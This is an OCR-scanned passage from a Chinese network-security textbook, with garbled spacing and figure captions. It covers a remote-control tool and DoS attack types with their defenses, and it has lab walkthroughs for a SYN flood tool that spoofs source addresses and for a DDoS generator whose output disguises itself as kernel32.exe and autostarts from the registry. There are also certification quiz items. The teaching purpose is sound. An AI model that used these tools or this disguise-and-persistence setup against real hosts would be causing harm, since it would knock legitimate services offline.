@ 启动 QuickIP 服务 器 时 会 弹出 一 个 提示 对 话 框 ,提示 用 户 设置 密码 , 单 击 “ 确 定 ” 
按钮 即 可 ,如 图 7-7 所 示 。 

@ 在 “修改 本 地 服务 器 的 密码 ”对 话 框 中 输入 要 设置 的 密码 ,然后 单 击 “ 确 定 ” 按 钮 ， 
如 图 7-8 所 示 。 

@ 密码 修改 成 功 后 会 弹出 一 个 提示 对 话 框 , 单 击 “ 确 定 ” 按 钮 ,如 图 7-9 所 示 。 








QuickIP 服务 器 x| 
和 


| 





图 7-8 修改 本 地 服务 器 的 密码 图 7-9 密码 修改 成 功 提示 
(2) 登录 客户 端 。 
@ 启动 黄色 图 标的 “QuickIP 客户 机 ”程序 ,在 工具 栏 中 单 击 “ 添 加 主机 ”按钮 ,如 


图 7-10 所 示 。 


FQuickIP 客户 机 





图 7-10 “QuickIP 客户 机 ” 主 窗口 


@ 输入 要 添加 主机 的 IP 地 址 、 端 口 以 及 密码 , 单 击 “ 确 认 ” 按 钮 ,如 图 7-11 所 示 。 
# 添加 远程 主机 | 





图 7-11 “添加 远程 主机 ”对 话 框 
加 返回 客户 端 主 窗口 中 , 单 击 刚 添加 的 远程 主机 IP 地 址 前 面 的 “十 ”号 即 可 看 到 所 
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127.0.0.1:7314 




















图 7-12 客户 端 主 窗口 


@ 单 击 “ 远 程 磁盘 驱动 器 "选项 就 会 弹出 “登录 到 远程 主机 ”对 话 框 ,输入 登录 密码 后 


单 击 * 确 认 ” 按 钮 即 可 完成 登录 ,如 图 7-13 所 示 。 


多 登录 到 远程 主机 X| 
EE 
2 





图 7-13 “登录 到 远程 主机 ?对 话 杠 


@ 登录 成 功 后 可 以 看 到 远程 目标 主机 的 所 有 磁盘 驱动 器 盘 符 , 可 以 对 磁盘 进行 任何 


操作 ,如 图 7-14 所 示 。 


QuickIP 客户 机 





图 7-14 ”磁盘 操作 菜单 





| 网 络 安全 部 署 ( 第 2 版 | 各 和 II 


@ 展开 “远程 控制 ”项 ,双击 “屏幕 控制 "项 即 可 实现 远程 屏幕 控制 操作 ,如 图 7-15 
所 示 。 


站 QuickIP 客户 机 





图 7-15 “屏幕 控制 ”项 


@ 在 “QuickIP 客户 机 ”的 工具 栏 中 单 击 “ 主 机 列表 ”按钮 。 

在 “编辑 远程 主机 ”对 话 框 中 可 添加 、 删 除 , 修 改 远 程 主机 ,设置 完毕 单 击 “ 保 存 ” 按 
钮 即 可 退出 ,如 图 7-16 所 示 。 

(3) 查看 QuickIP 服务 器 信息 。 

@ 启动 红色 图 标的 “QuickIP 服务 器 ”程序 ,在 其 主 界面 中 可 以 看 到 客户 机 上 的 所 有 
操作 信息 ,如 图 7-17 所 示 。 

QuickIP 服 务 
QuickIP 服务 器 


服务 器 状态 ; 正 运行 接收 : 3505 发 送 :223097 
服务 器 信息 ; zmcserver2003[192. 168. 198. 128:7314 192, 168.31.3:7314: 





[sz 158 31 111 1075 下 活 寺 
# 编辑 远程 主机 





图 7-16 “编辑 远程 主机 ”对 话 框 图 7-17 “QuickIP 服务 器 ”窗口 


@ 在 “QuickIP 服务 器 管理 ?对 话 框 中 单 击 “修改 监听 端口 按钮 ,如 图 7-18 所 示 。 
@ 在 “修改 服务 器 监听 端口 ”对话 框 中 清除 “使 用 默认 的 监听 端口 " 复 选 框 即 可 修改 
端口 ,修改 后 单 击 “ 确 认 ” 按 钮 。 
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图 7-18 “修改 服务 器 监听 端口 "对 话 框 


@ 在 “QuickIP 服务 器 管理 "对话 框 中 单 击 “ 修 改 密码 "按钮 。 
@ 在 “修改 本 地 服务 器 的 密码 "对话 框 中 的 第 一 个 文本 框 中 输入 以 前 的 密码 ,在 后 面 
的 两 个 文本 框 中 输入 相同 的 修改 后 的 密码 ,修改 后 单 击 “ 确 认 ” 按 钮 。 


7.5 常见 问题 解答 


1. 被 木马 攻击 的 原因 ? 防御 的 措施 有 哪些 ? 

答 : 被 木马 攻击 的 主要 原因 是 IPC $ 连接 和 弱 密 码 。 为 了 使 自己 的 机 器 不 成 为 肉 
鸡 ,应 关闭 IPC$ 连接 ,关闭 139、445 端口 ,并 使 用 复杂 密码 。 

2. 为 什么 远程 计算 机 已 经 正常 运行 了 服务 器 端 , 却 不 能 正常 建立 连接 ? 

答 : 很 多 善意 的 远程 控制 软件 都 需要 被 控 端 操作 者 的 确认 ,所 以 必须 设置 登录 密码 
才能 正确 登录 ,这 也 是 为 了 保证 被 控 端 计算 机 的 安全 。 

3. 计算 机 病毒 .恶意 代码 、 网 络 蠕虫 和 木马 的 区 别 和 联系 是 什么 ? 

答 : 计算 机 病毒 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 ,或 者 毁坏 数 
据 以 影响 计算 机 使 用 ,并 能 自我 复制 的 一 组 计算 机 指令 或 代码 。 传 染 性 是 判断 一 段 程序 
代码 是 否 为 计算 机 病毒 的 依据 。 计 算 机 病毒 的 主要 特征 包括 : 传播 方式 多 样 , 传 播 速度 
极 快 ,影响 面 极 广 , 破 坏 性 极 强 ,难以 控制 和 根治 ,编写 方式 多 样 , 变 种 多 ,智能 化 , 兼 有 木 
马 、 蠕 虫 和 后 门 等 功能 。 恶 意 代 码 是 指 在 不 被 察觉 的 情况 下 ,把 代码 寄宿 到 另 一 段 程序 
中 ,进而 通过 运行 有 入 侵 性 或 破坏 性 的 程序 ,达到 破坏 被 感染 计算 机 和 网 络 系统 的 目的 。 
恶意 代码 包括 普通 病毒 .蠕虫 木马 等 。 网 络 蠕虫 是 一 个 自我 包含 的 程序 , 它 能 够 传播 自 
身 的 功能 或 复制 自身 的 片段 到 其 他 的 与 网 络 连 通 的 计算 机 系统 。 网 络 蠕虫 由 多 个 部 分 组 
成 ,每 个 部 分 运行 在 不 同 计算 机 上 ,并 使 用 网 络 进行 通信 。 与 计算 机 病毒 不 同 ,蠕虫 不 需 
要 把 自身 附加 在 宿主 程序 上 ,而 是 一 个 独立 的 程序 ,能 够 主动 运行 。 木 马 与 病毒 不 同 之 处 
在 于 ,木马 是 没有 自我 复制 功能 的 恶意 程序 。 


7.6 认证 试题 


一 、 选 择 题 
1. 计算 机 感染 特洛伊 木马 后 的 典型 现象 是 ( ys 
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A. 程序 异常 退出 
B. 有 未 知 程序 试图 建立 网 络 连接 
C. 邮箱 被 垃圾 邮件 填 满 
D. Windows 系统 黑屏 
2. 下 列 行为 不 属于 网 络 攻 击 的 是 ( )s 
A. 连续 不 断 Ping 某 台 主机 
B. 发 送 带 病毒 和 木马 的 电子 邮件 
C. 向 多 个 邮箱 群发 一 封 电子 邮件 
D. 暴力 破解 服务 器 密码 
3. 在 下 面 4 种 病毒 中 ,( ) 可 以 远程 控制 网 络 中 的 计算 机 。 





A. worm. Sasser.f B. Win32.CIH 
C. Trojan. qq3344 D. Macro. Melissa 
4. 以 下 不 属于 木马 传播 的 方式 是 ( hs 
A. 软件 捆绑 B. 邮件 附件 C. 文件 感染 D. 危险 下 载 


5. 下 列 描述 与 木马 相关 的 是 ( 
A. 由 客户 端 程序 和 服务 器 端 程序 组 成 
.感染 计算 机 中 的 文件 
. 破坏 计算 机 系统 
.进行 自我 复制 
) 不 是 Windows Server 2012 的 系统 进程 。 


. System Idle Process B. iexplorer. exe 


的 友好 -全 加 


. lsass. exe D. services. exe 
二 、 操作 题 
在 自己 和 朋友 的 计算 机 上 使 用 软件 尝试 进行 远程 控制 。 


8.1 用 户 需求 与 分 析 


拒绝 服务 攻击 是 指 利 用 合理 的 服务 请 求 来 占用 过 多 的 服务 资源 ,从 而 使 合法 用 户 无 
法 及 时 得 到 服务 响应 的 一 种 攻击 方式 。 攻 击 者 进行 拒绝 服务 攻击 ,实际 上 是 在 服务 器 上 
造成 两 种 结果 ,一 种 是 迫使 服务 区 的 缓冲 区 满 ,不 能 接收 新 的 请 求 ; 另 一 种 是 使 用 IP 其 
骗 ,迫使 服务 器 把 合法 用 户 的 连接 复位 ,影响 合法 用 户 的 连接 。 


8.2 预备 知识 


8 2 1 拒绝 服务 攻击 的 定义 


拒绝 服务 攻击 的 目的 是 为 了 让 目标 主机 停止 提供 服务 或 资源 访问 ,这 些 资 源 包括 磁 
盘 空间 内存、 进程 甚至 网 络 带 宽 , 从 而 阻止 正常 用 户 的 访问 。 

根据 攻击 的 手法 和 目的 的 不 同 ,拒绝 服务 攻击 可 以 分 为 两 种 。 一 种 以 消耗 目标 主机 
的 可 用 资源 为 目的 ,使 目标 主机 疲 于 应 付 大 量 无 用 的 连接 请 求 , 占 用 了 所 有 的 资源 ,无 法 
对 正常 的 请 求 做 出 及 时 响应 ,从 而 导致 服务 中 断 。 这 种 攻击 主要 利用 网 络 协议 或 系统 漏 
洞 进行 攻击 ,主要 的 攻击 方式 有 死亡 之 Ping、SYN Flood、UDP Flood ICMP Flood、Land 
等 。 另 一 种 以 消耗 目标 主机 的 有 效 带宽 为 目的 ,攻击 者 通过 发 送 大量 数 据 包 , 将 整 条 链 路 
的 带宽 全 部 占用 ,从 而 使 合法 用 户 请 求 无 法 通过 链 路 到 达 目 标 主机 。 例 如 ,蠕虫 具体 的 攻 
击 方式 有 发 送 垃圾 邮件 .向 FTP 服务 器 塞 垃圾 文件 、 塞 满目 标 主机 的 硬盘 、 伪 装 账号 错误 
登录 ,导致 账号 连续 多 次 登录 失败 被 锁定 ,那么 正常 的 合法 用 户 也 不 能 用 这 个 账号 登录 系 
统 了 。 


8&822 常见 拒绝 服务 攻击 行为 及 防御 方法 
下 面 针 对 几 种 典型 的 拒绝 服务 攻击 行为 进行 分 析 , 并 提出 相应 的 对 策 。 
1. 死亡 之 Ping(Ping of Death) 攻 去 
早期 路 由 器 对 数据 包 的 大 小 有 限制 ,很 多 操作 系统 的 TCP/IP 规定 ICMP 包 的 大 小 
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限制 在 64KB 以 内 。 遇 到 大 小 超过 64KB 的 ICMP 包 会 出 现 内 存 分 配 错误 ,使 接收 方 计 
算 机 死机 。 根 据 这 一 原理 ,黑客 们 只 需要 不 断 地 通过 ping 命令 向 攻击 目标 发 送 超过 
64KB 的 数据 包 , 就 可 以 致使 接收 方 计算 机 死机 。 

防御 的 方法 是 使 用 补丁 程序 ,在 接收 数据 包 之 前 先 判断 数据 包 的 大 小 是 否 大 于 
64KB, 超 过 则 丢弃 该 数据 包 。 现在 所 有 的 TCP/IP 协议 都 具有 对 付 超过 64KB 大 小 的 数 
据 包 的 处 理 能 力 ,并 且 大 多 数 防火 墙 能 自动 过 滤 这 些 攻击 。 很 多 操作 系统 如 Windows 
XP/Server 2003、Linux 等 都 具有 抵抗 一 般 死 亡 之 Ping 的 能 力 。 





2. 泪 滴 (Teardrop) 攻 击 


对 于 一 些 大 的 数据 包 , 为 了 符合 链 路 层 最 大 传输 单元 (MTU) 的 要 求 ,往往 需要 拆 分 
传送 ,这 样 接收 端 在 接收 完全 部 IP 数据 包 后 ,可 以 根据 * 偏 移 字段 "得 知 某 个 片段 在 整个 
IP 包 中 的 位 置 , 从 而 将 这 些 片段 重新 组 装 。 如 果 黑 客 在 截取 IP 数据 包 后 ,把 * 偏 移 字段 ” 
设置 成 错误 的 值 , 导 致 接收 端 不 能 正确 组 合 这 些 拆 分 的 数据 包 , 但 接收 端 会 不 断 尝试 ,就 
导致 目标 主机 因 资 源 耗 尽 而 崩溃 。 

防御 方法 是 对 接收 到 的 分 片 数 据 包 进行 分 析 , 计 算数 据 包 的 偏 移 量 是 否 有 误 。 反 攻 
击 的 方法 是 添加 系统 补丁 程序 ,丢弃 收 到 的 病态 分 片 数据 包 , 尽 可 能 采用 最 新 的 操作 系 
统 ,或 在 防火 墙 上 设置 分 段 重组 功能 ,由 防火 墙 接收 到 同一 原 包 中 的 所 有 拆 分 数据 ,然后 
完成 重组 工作 。 


3. TCP SYN 洪水 (TCP SYN Flood) 攻 击 


攻击 者 利用 伪造 的 IP 地 址 向 目标 发 出 多 个 连接 请 求 , 目 标 主机 在 接收 到 请 求 后 发 送 
确认 信息 ,并 等 待 回答 。 巾 于 IP 地 址 是 伪造 的 ,所 以 确认 信息 也 不 会 到 达 任 何 计算 机 , 当 
然 也 就 不 会 有 任何 计算 机 为 此 确认 信息 做 出 应 答 了 。 而 在 没有 收 到 应 答 之 前 ,目标 计算 
机 会 在 缓冲 区 保持 连接 信息 并 一 直 等 待 。 当 等 待 连接 达到 一 定数 量 、 缓 冲 区 资源 耗 尽 后 ， 
开始 拒绝 所 有 其 他 连接 请 求 , 当然 也 包括 本 来 属于 正常 应 用 的 请 求 。 

防御 方法 是 可 以 检查 单位 时 间 内 收 到 的 SYN 连接 是 否 超出 系统 设 定 的 值 。 当 接收 
到 大 量 SYN 数据 包 时 ,通知 防火 墙 阻 断 连接 请 求 或 丢弃 数据 包 , 并 在 防火 墙 上 过 滤 来 自 
同一 主机 的 后 续 连 接 。 不 过 由 于 此 类 攻击 不 寻求 响应 ,所 以 无 法 从 一 个 简单 的 高 容量 传 
输 中 鉴别 出 来 。 


4. Land 攻击 


Land 攻击 中 的 数据 包 源 地 址 和 目标 地 址 是 相同 的 , 当 操作 系 统 收 到 这 类 数据 包 时 ， 
不 知 该 如 何 处 理 , 循 环 发 送 和 接收 该 数据 包 会 消耗 大 量 的 系统 资源 ,从 而 有 可 能 造成 系统 
崩溃 或 死机 。 

防御 的 方法 是 直接 通过 判断 网 络 数据 包 的 源 地 址 和 目标 地 址 是 否 相同 来 确认 是 否 属 
于 攻击 行为 。 反 攻击 的 方法 是 配置 防火 墙 设备 或 制定 包 过 滤 路 由 器 的 包 过 滤 规 则 。 
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5. 分 片 IP 报 文 攻击 


攻击 者 给 目标 计算 机 只 发 送 一 片 分 片 报 文 ,而 不 发 送 所 有 的 分 片 报 文 ,这 样 目 标 计算 
机 便 会 一 直 等 待 ,如 果 攻 击 者 发 送 了 大 量 分 片 报 文 ,就 会 消耗 掉 目 标 计算 机 的 资源 ,而 导 
致 不 能 接收 正常 的 IP 报 文 。 

对 于 这 种 攻击 方式 ,目前 还 没有 一 种 十 分 有 效 的 防御 方法 ,对 于 一 些 包 过 滤 设 备 或 人 
侵 检测 系统 来 说 ,通常 是 通过 判断 第 一 个 分 片 的 目标 端口 号 来 决定 后 续 分 片 是 否 允许 通 
过 ,但 一 些 恶意 分 片 的 目标 端口 号 是 位 于 第 二 个 分 片 中 ,因此 会 躲 过 一 些 人 侵 检测 系统 及 
一 些 安全 过 滤 系 统 , 从 而 在 目标 主机 上 重组 之 后 形成 各 种 攻击 。 目 前 有 一 些 智 能 的 包 过 
滤 设 备 可 以 直接 丢掉 报头 中 不 包含 端口 信息 的 分 片 ,但 这 种 设备 价格 较 高 ,不 是 每 个 企业 
都 能 承受 得 起 。 


6. Smurf 攻击 


利用 多 数 路 由 器 具有 同时 向 许多 计算 机 广播 请 求 的 功能 。 攻 击 者 伪造 一 个 合法 的 
IP 地 址 ,然后 由 网 络 上 所 有 的 路 由 器 广播 要 求 向 受 攻击 计算 机 地 址 做 出 回答 的 请 求 。 由 
于 这 些 数据 包 看 上 去 是 来 自己 知 地 址 的 合法 请 求 , 使 得 网 络 中 所 有 主机 都 对 此 ICMP 应 
答 请 求 做 出 答复 ,导致 网 络 阻塞 。 这 种 攻击 比 死亡 之 Ping 和 SYN 洪水 流量 高 出 一 至 两 
个 数量 级 ,更 容易 攻击 成 功 , 还 有 些 Smurf 攻击 将 源 地 址 改 成 第 三 方 受害 者 的 了 了 地址 ,而 
不 是 伪造 的 IP 地 址 ,最 终 导致 第 三 方 受害 者 计算 机 系统 崩溃 。 

防御 的 方法 是 关闭 外 部 路 由 器 或 防火 墙 的 广播 地 址 特性 ,并 在 防火 墙 上 设置 规则 , 丢 
弃 ICMP 协议 类 型 的 数据 包 。 


7. 虚拟 终端 (VTY) 耗 尽 攻击 


交换 机 和 路 由 器 等 网 络 设备 为 了 便于 远程 管理 ,一 般 都 设置 了 Telnet 用 户 界面 , 即 
用 户 可 以 通过 Telnet 远程 登录 到 该 设备 上 ,对 这 些 设备 进行 管理 。 通 常 这 些 设备 的 
Telnet 用 户 界面 个 数 是 有 限制 的 ,比如 5 个 或 10 个 。 然 而 攻击 者 同时 跟 一 台 网 络 设备 建 
立 5 个 或 10 个 Telnet 连接 ,就 会 导致 这 些 设备 的 远程 管理 界面 被 占 尽 , 当 合法 用 户 再 对 
这 些 设备 进行 远程 管理 时 , 则 会 因为 Telnet 连接 资源 被 占用 而 失败 。 

防御 的 方法 是 升级 交换 机 和 路 由 器 等 网 络 设备 的 COS 或 IOS 系统 ,通常 新 版 本 的 系 
统 会 对 该 问题 进行 改进 。 


8. 电子 邮件 炸弹 


攻击 者 在 很 短 的 时 间 内 连续 不 断 地 向 同一 地 址 发 送 大 量 电 子 邮 件 , 耗 尽 邮件 接收 者 
的 网 络 带宽 资源 ,导致 网 络 拥塞 ,大 量 合法 用 户 不 能 正常 工作 ,同时 占用 掉 邮 件 接收 者 有 
限 的 邮箱 容量 ,用 户 的 邮箱 将 没有 多 余 的 空间 接收 新 邮件 ,新 邮件 将 会 丢失 或 退回 ,造成 
邮箱 失效 ,而 邮件 炸弹 携带 的 大 容量 信息 不 断 在 网 络 中 来 回 传输 ,堵塞 传输 信道 ,加 大 邮 
件 服 务 器 的 工作 强度 ,减缓 处 理 其 他 用 户 电 子 邮 件 的 速度 ,导致 恶性 循环 。 

防御 的 方法 是 对 邮件 进行 过 滤 ,自动 删除 来 自 同一 主机 的 过 量 或 重复 的 消息 。 或 在 
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接收 任何 电子 邮件 之 前 预先 检查 发 件 人 的 资料 ,有 可 疑 之 处 便 将 之 删除 。 同 时 将 邮件 服 
务 器 设置 为 超过 邮箱 容量 的 大 邮件 自动 删除 ,这 样 就 可 以 有 效 避 免 “中 弹 ”。 


8 2 3 分 布 式 拒绝 服务 攻击 的 定义 


分 布 式 拒绝 服务 攻击 (Distributed Denial of Service, DDoS) 又 称 为 洪水 攻击 。 它 是 
一 种 分 布 .协作 的 大 规模 攻击 方式 ,攻击 者 利用 多 台 计算 机 攻击 比较 大 的 商业 站 点 、 搜 索 
引擎 ,政府 部 门 站 点 等 。DDos 攻击 是 在 传统 的 DoS 攻击 的 基础 上 发 展 起 来 的 一 类 攻击 
方式 。 单 一 的 拒绝 服务 攻击 一 般 采 用 一 对 一 的 方式 , 当 攻 击 目 标的 CPU 速度 低 、 内 存 小 
或 网 络 带宽 小 等 各 项 性 能 指标 不 高 时 ,这 种 攻击 的 效果 较 明 显 。 随 着 计算 机 与 网 络 技术 
的 发 展 , 计 算 机 的 处 理 能 力 迅 速 增强 ,内 存 大 大 增加 ,网 络 带宽 也 越 来 越 大 了 ,对 于 恶意 攻 
击 包 的 “消化 能 力 ” 增 强 了 不 少 ,这 使 得 DoS 攻击 的 困难 程度 增加 了 。 这 时 分 布 式 拒绝 服 
务 攻击 DDoS 就 应 运 而 生 了 。 当 计算 机 和 网 络 的 处 理 能 力 加 大 时 .用 一 台 计 算 机 攻击 不 
再 有 效 ,那么 攻击 者 使 用 分 布 式 、 协 同 式 的 大 规模 攻击 方式 ,利用 多 台 计 算 机 来 发 起 攻击 ， 
用 比 以 前 更 大 的 规模 来 进攻 目标 主机 。 





8.3 方案 设计 


方案 设计 如 表 8-1 所 示 。 
表 8-1 方案 设计 
任务 名 称 拒绝 服务 攻击 





.拒绝 服务 攻击 工具 SYN Flood 的 使 用 


全 和 分 本 . 分 布 式 拒绝 服务 攻击 工具 DDoS 攻击 者 的 使 用 


~ 





.能 对 拒绝 服务 攻击 工具 SYN Flood 的 攻击 属性 进行 设置 

.能 使 用 拒绝 服务 攻击 工具 SYN Flood 对 目标 主机 发 动 拒绝 服务 攻击 

能 使 用 网 络 监 听 工 具 查看 攻击 效果 

.能 对 分 布 式 拒绝 服务 攻击 工具 DDoS 攻击 者 的 攻击 属性 进行 设置 

. 能 使 用 分 布 式 拒绝 服务 攻击 工具 DDoS 攻击 者 对 目标 主机 发 动 拒绝 服务 攻击 


能 力 目标 


ao 





. 熟悉 拒绝 服务 攻击 的 定义 
. 了 解 拒绝 服务 攻击 的 原理 
. 了 解 常见 拒绝 服务 攻击 的 行为 及 防御 方法 


知识 目标 


wD 





. 培养 良好 的 职业 道德 

. 树立 较 强 的 安全 意识 

. 掌握 网 络 安全 行业 的 基本 情况 

. 树立 较 强 的 安全 、 节 约 、 环 保 意识 


素质 目标 





wn- 
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8.4 项 目 实 施 


8&841 任务 1: 拒绝 服务 攻击 工具 SYN Rood 的 使 用 
1. 任务 目标 


使 用 SYN Flood 伪造 源 IP 地 址 、 源 端口 号 ,对 目标 主机 发 动 攻击 。 攻 击 类 型 包括 
SYN.PSH&ACK、3HD、Rage3HD、ICMP\ 碎 片 SYN、WebTest。 


2. 工作 任务 
拒绝 服务 攻击 工具 SYN Flood 的 使 用 。 
3. 工作 环境 


(1) 两 台 预 装 Windows 7 系统 的 主机 ,通过 网 络 相 连 。 
(2) 软件 工具 : 拒绝 服务 攻击 工具 SYN Flood。 


4. 实施 过 程 
(1) 双击 SYN Flood 运行 程序 ,弹出 主 程序 窗口 , 单 击 “ 新 建 攻击 ”按钮 ,弹出 “攻击 
属性 设置 ”对话 框 ,如 图 8-1 所 示 。 
攻击 属性 设置 


192.168.31.111 


192.168.0.1 - 192.168,0,100 


192 .168 . 0 ,1 
[1s2 .168 .0 .lo | 168 . 0 .100 





图 8-1 “攻击 属性 设置 "对 话 框 


(2) 在 “攻击 属性 设置 "对话 框 中 填 入 攻击 目标 的 IP 地 址 ,选择 攻击 类 型 ,比如 SYN。 
然后 设置 目标 端口 .攻击 线程 和 最 大 连接 数 ,添加 伪造 源 地 址 和 源 端 口 范围 。 最 后 单 击 
“确定 ”按钮 。 
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(3) 被 攻击 的 目标 主机 通过 Sniffer Pro 查看 到 网 络 连 接 情 况 , 发 现 有 100 个 主机 与 
目标 主机 保持 连接 ,如 图 8-2 所 示 。 


Td) -olx| 
薛 输 坛 图 为 了 192.168.31.111 





图 8-2 目标 主机 的 网 络 连接 示意 图 
(4) 还 可 以 查看 到 整个 网 络 中 计算 机 所 用 带宽 前 10 名 的 情况 ,如 图 8-3 所 示 , 都 是 由 


192168082 因 13216803 





192168032 ”图 192168098 







加 192168033 国 192168044 


192168072 国 19216807 


加 132168037 图 192168021 


8-3 网络 中 带宽 显示 柱状 图 


(5) 通过 任务 管理 器 观察 系统 性 能 的 变化 .CPU 利用 率 从 10% 上升 到 100%% ,可 以 看 
到 SYN Flood 攻击 的 危害 性 ,如 图 8-4 所 示 。 

(6) 这 个 攻击 效果 是 一 对 一 攻击 的 结果 ,如 果 是 多 对 一 攻击 ,会 导致 被 攻击 主机 蓝 
屏 。 在 攻击 端 主 窗口 中 单 击 “ 新 建 攻击 ”按钮 ,可 以 添加 攻击 线程 ,增强 攻击 效果 。 

(7) 在 攻击 端 主 窗 口中 单 击 “ 退 出 ?按钮 可 以 结束 攻击 。 
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隆 程 数 : 40 
图 8-4 SYN 攻击 后 系统 性 能 变化 


[cPu 便 用 :74% ”| 内 存 使 用 : 325M / 1254M 才 





842 任务 2: 分 布 式 拒绝 服务 攻击 工具 DDoS 攻击 者 的 使 用 
1. 任务 目标 


本 软件 是 一 个 DDoS 攻击 工具 ,程序 运行 后 自动 驻 入 系统 ,并 在 以 后 随 系统 启动 ,在 
上 网 时 自动 对 事先 设 定好 的 目标 进行 攻击 。 可 以 自由 设置 “并 发 连接 线程 数 ”“ 最 大 TCP 
连接 数 "等 参数 。 由 于 采用 了 与 其 他 同类 软件 不 同 的 攻击 方法 ,效果 更 好 。 


2. 工作 任务 
分 布 式 拒绝 服务 攻击 工具 DDoS 攻击 者 的 使 用 。 
3. 工作 环境 


(1) 两 台 预 装 Windows 7 系统 的 主机 ,通过 网 络 相连 。 
(2) 软件 工具 : DDoS 攻击 测试 工具 。 


4. 实施 过 程 


(1) 运行 DDoS 攻击 生成 器 (DDoSMaker. exe) ,弹出 “DDoS 攻击 者 生成 器 "对话 框 ， 
如 图 8-5 所 示 。 

(2) 先进 行 必要 的 设置 ,在 “目标 主机 的 域名 或 IP 地 址 ”文本 框 中 填 和 人 要 攻击 主机 的 
域名 或 IP 地 址 。 在 “端口 "文本 框 中 填 入 要 攻击 的 端口 .这 里 需要 填 TCP 端口 ,因为 该 工 
具 只 能 攻击 基于 TCP 的 服务 。 填 入 80 攻击 HTTP 服务 , 填 入 21 攻击 FTP 服务 , 填 和 人 
25 攻击 SMTP 服务 , 填 人 110 攻击 POP3 服务 。“ 并 发 连接 线程 数 ” 是 指 同时 多 个 线程 去 
连接 指定 的 端口 ,此 值 越 大 对 目标 主机 的 攻击 越 强 ,但 占用 本 机 资源 也 越 大 。 默 认 值 是 
10 个 线程 。“ 最 大 TCP 连接 数 ” 的 默认 值 是 1000 个 连接 。 最 后 在 “DDoS 攻击 者 程序 保 
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名 DDoS 芭 击 者 生成 器 v1.4 jx) 
攻击 设置 

目标 主机 的 域名 或 IT 地 址 红 ); 端口 外 ): 

[= -ee 










并 发 连接 钱 程 数 [): [10 个 战 程 


最 大 TCP 演 接 数 虽 : [1000 ”个 连接 国 





广 自居 动 设置 
注册 表 启 动 项 键 名 EK); |K*rne1 322 
服务 编程 序 文件 和 名人): |kernel32 exe 
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图 8-5 “DDoS 攻击 者 生成 器 ”对 话 框 








存 为 ”文本 框 内 指定 生成 的 DDoS 攻击 者 程序 保存 的 位 置 和 名 称 。 

(3) 双击 生成 的 DDoS 攻击 者 程序 ,开始 对 目标 主机 发 动 攻击 。 

(4) 通过 目标 主机 的 任务 管理 器 观察 系统 性 能 的 变化 ,从 CPU 利用 率 变化 可 以 看 到 
DDoS 攻击 的 危害 性 ,如 图 8-6 所 示 。 
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陵 程 数 : 41 。 |cPu 使 用 : 10% ”| 内 存 使 用 : 697M / 1254M 才 


图 8-6 任务 管理 器 
8.5 常见 问题 解答 
1. DoS 攻击 和 DDoS 攻击 的 区 别 是 什么 ? 


答 : DoS 是 一 种 利用 单 台 计算 机 的 攻击 方式 ,而 DDoS 是 一 种 基于 DoS 的 特殊 形式 
的 拒绝 服务 攻击 ,是 一 种 分 布 协 作 的 大 规模 攻击 方式 ,主要 瞄准 比较 大 的 站 点 ,如 商业 公 
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司 ,搜索 引擎 和 政府 部 门 的 站 点 ,DDoS 攻击 是 利用 一 批 受 控制 的 计算 机 向 一 台 计 算 机 发 
起 攻击 ,这样 来 势 凶猛 的 攻击 让 人 难以 防备 ,因此 具有 更 大 的 破坏 性 。 

2. 防御 DDoS 攻击 的 方法 有 哪些 ? DDoS 攻击 是 不 是 可 以 百 分 百 防 御 呢 ? 

答 : 防御 DDoS 攻击 是 一 个 系统 工程 , 仅 依靠 某 种 系统 或 产品 来 防御 是 不 现实 的 。 
完全 杜绝 DDoS 攻击 目前 是 不 可 能 的 ,但 通过 适当 的 措施 抵御 90% 的 DDoS 攻击 还 是 可 
以 做 到 的 。 防 御 DDoS 攻击 的 方法 有 定期 扫描 ,在 骨干 节点 配置 防火 墙 \ 用 足够 的 计算 机 
承受 黑客 攻击 、 充 分 利用 网 络 设备 保护 网 络 资源 ,以 及 过 滤 不 必要 的 服务 和 端口 等 。 基 于 
攻击 和 防御 的 成 本 开销 考虑 ,如 果 通 过 适当 的 措施 增强 了 抵御 DDoS 的 能 力 , 也 就 意味 着 
增 大 了 攻击 者 的 攻击 成 本 ,那么 绝 大 多 数 攻击 者 都 将 因 无 法 继续 下 去 而 放弃 ,也 就 相当 于 
成 功 地 抵御 了 DDoS 攻击。 


8.6 认证 试题 


一 、 选 择 题 


1. 拒绝 服务 攻击 ( ) 。 
A. 用 超出 被 攻击 目标 处 理 能 力 的 海量 数据 包 消 耗 可 用 系统 .带宽 资源 等 方法 的 
攻击 
B. 全 称 是 Distributed Denial of Service 
C. 拒绝 来 自 一 个 服务 器 所 发 送 回 应 请 求 的 指令 
D， 入 侵 控制 一 个 服务 器 后 远程 关机 
2. TCP SYN Flooding 建立 大 量 处 于 半 连 接 状态 的 TCP 连接 ,其 攻击 目标 是 网 络 的 
( es 
A. 保密 性 B. 完整 性 C. 真实 性 D. 可 用 性 
3， 当 感觉 到 操作 系统 运行 速度 明显 减 慢 , 打 开 任 务 管理 器 后 发 现 CPU 的 使 用 率 达 
到 100% 时 ,最 有 可 能 受到 ( ) 攻 击 。 


A. 特洛伊 木马 B. 拒绝 服务 C. ARP D. 网 络 监 听 
4. 在 网 络 攻击 活动 中 ,Tribal Flood Network(TFN) 是 ( ) 类 的 攻击 程序 。 

A. 拒绝 服务 B. 字典 攻击 C. 网 络 监听 D. 病毒 程序 
5. 死亡 之 Ping 属于 ( ) 攻 击 。 

A. 冒充 B. 拒绝 服务 C. 重 放 D. 算 改 
6. ) 无 法 有 效 防御 DDoS 攻击 。 


A. 根据 IP 地 址 对 数据 包 进 行 过 滤 
B. 为 系统 访问 提供 更 高 级 别 的 身份 认证 
C. 安装 防 病毒 软件 
D. 使 用 工具 软件 检查 不 正常 的 高 流量 
7. DDoS 攻击 破坏 了 ( Ys 
A. 可 用 性 B. 保密 性 C. 完整 性 D. 真实 性 
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8. 驻 留 在 多 个 网 络 设备 上 的 程序 在 短 时 间 内 同时 产生 大 量 的 请 求 消息 冲击 某 Web 
服务 器 ,导致 该 服务 器 不 堪 重 负 , 无 法 正常 响应 其 他 合法 用 户 的 请 求 ,这 属于 ( Ys 





A. 上 网 冲浪 B. 中 间 人 攻击 C. DDoS 攻击 D. MAC 攻击 
二 、 判 断 题 
1. 当 服 务 器 遭受 到 DoS 攻击 时 ,重启 系统 就 可 以 阻止 攻击 。 ( ) 
2. DoS 攻击 不 但 能 使 目标 主机 停止 服务 ,还 能 入 侵 系 统 ,打开 后 门 ,得 到 想 要 的 
资料 。 ( ) 
三 、 操 作 题 


对 本 地 计算 机 进行 SYN 攻击 压力 测试 。 


